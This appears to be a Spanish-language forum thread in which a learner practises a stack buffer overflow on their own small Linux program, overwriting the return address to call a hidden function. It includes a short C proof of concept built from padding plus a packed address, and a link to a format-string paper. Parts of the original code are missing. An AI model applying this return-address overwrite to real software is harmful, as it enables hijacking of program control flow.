Saludos,

Hice un pequeño programa para practicar el overflow , la idea es tratar de hacer que el programa llame a una funcion que nunca se llama , ejemplo:


Eso es solo un  ejemplo rapido pero el overflow si se llega a producir y llego a sobre escribir la direccion de retorno. Usando el objdump y gdb encontre que el offset de la funcion oculta es 0x80483be algo que quedaria haci:


Pero no funciona , pienso que es porque el x08 es un backspace y no llega a salir cuando trato de explotar el fallo. Acaso hay algo que estoy implementando mal o alguien me da alguna idea o opinion?

PD: Esto es en linux , porque lo intente en windows y el offset era un 004.... y no se puede o no pude llamar a un x00.

 no , los format bugs estoy vencido por ahora  , este es un buffer overflow , el codigo es haci


Y luego otra funcion , el codigo de arriba era solo un ejemplo de las funciones,  el unico problema que tengo es el offset que aparentemente no lo quiere cojer el x08 o quizas sea solo algo que ago malo pero seguire intentando.

programa:


poc:
[code#include <stdio.h>

int main(int argc,char *argv[])
{

char code[1024];
char buf[] = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN";
char offset[] = "\xbe\x83\x04\x08";

strcat(code,buf);
strcat(code,offset);

execl("hzb","hzb",code,0); //hzb es el programa compilado

return 0;
}
]

Bien que te haya salido.
FORMAT BUGS:
http://julianor.tripod.com/teso-fs1-1.pdf

Si hiciera algo seria traducirlo, depronto agregarle alguito......pero para que ?